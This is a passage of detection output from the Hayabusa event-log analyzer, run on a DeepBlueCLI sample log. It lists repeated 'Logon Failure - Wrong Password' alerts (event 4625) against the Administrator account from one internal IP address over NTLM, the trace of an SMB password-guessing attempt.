NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.234 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WQLsoIX9LPvbockz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xRYbdVMbUlqFK8oM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.316 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OSO730O1fxDL4DfQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5wmniv339HLGKB4u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rO3mxvgSES0lVN34 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.433 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fvK9k9tnCq5hwBqe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ujFfMT6I6L8OHag9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.517 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FWKY2Wh21sePUR1L | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.562 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6E6yf8D5cPOEwR0y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OpFho8k52BkBlg4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ucDvfSfDYZzjNWFS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vnq3S0gEE98xfYLv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: seVfaEdAS6lEXgkG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.764 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gz8BQAlyYXB61tx3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nkHLs6yikRWVjj9F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0bQUcnUBCmE81G6I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BceDCcXoHJQv9pDi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GCCLt49g8wmAMEyV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pM6C8KRcxVIUsZrZ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fw5DU6l3QRVl9cWY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 37UthbuO3m4Lr7dU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: URB7Ji5pQleLtvy4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.101 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: orP9OgiBrYIKZPXE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.132 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZwvdnlIWhqoDg8On | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.181 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v6dXVbmLBpXc39ah | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Mu7amiHAg0l7bza | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JdG6F697kAXFDx9m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jY5AAnfQMH3VZQUa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iVep4j7jZZAOAQAj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KWWtGIQx8jBgAeoH | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.427 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zn8X8gen8gX9i3QK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B9OdUM99RBHzwgVs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.518 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJbBVm6wDrqyQmpZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tAVRBfMxIyrfsEtR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wuCIClZihRxRyjGF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.796 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yxhpEP6nnmihvkHB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.833 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J1HYmJDrWmKjj8DF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V81dIfR2SRNDk3a2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vaZpLaxB1kcCXqHP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.949 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JRhs8IoV6R6vyCdL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4wUYds3Ym3G2abrV | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tmBfxm6pPLlSEsUI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VbAuqFggx0zz5iEn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.104 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8cytpVOjb4KrNaGg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BFFFt7eFzmlzbHhG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AJQBZZiNKVGXzx4A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.224 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7gyu6EyrtbyowTfC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.267 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aASpkRuPfE8Nl64n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.306 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MSI2b7LpZpWO3xJW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: avNkOq3fsGN3yYJi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.384 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wnlgy6dW33tRk6UX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: msJ8QrqMluTeUlM9 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H33NuKduMuskxL0D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BHjp69CD1ttbaK2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5uxByLPApvfeIhU2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6g0WOAnoGpKyEyzW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.640 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P8MTs4Nkbm3ryqcp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.688 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Nyd7tr3y0BHmPLM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.731 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J5KiDQOEnDf6xEPN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3MBP1buuRcBRiQTG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXXdcg3MSqnGSvax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Kej7zgIDCNR5tnnp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gjM8SOeQXwytB6iw | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XPNATM0IL05vtbZ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H56ci5gbBVzebS2j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6rRofLg1uxrojU7n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MAhtwTU8OttAhcxf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CwKgAR6OWbkFlxUy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.129 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lNZR4G0DVsXVg4A9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.174 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OZG99tl0RRN3cQoK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.216 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nwRzAutxa07Y1xE4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OwhvrVBSRa8RcCKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bLBwBys2favoK7BQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.335 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3oYpj1rGcsOWNSs7 | IP Addr: 192.168.198.149 | AuthPackage: 
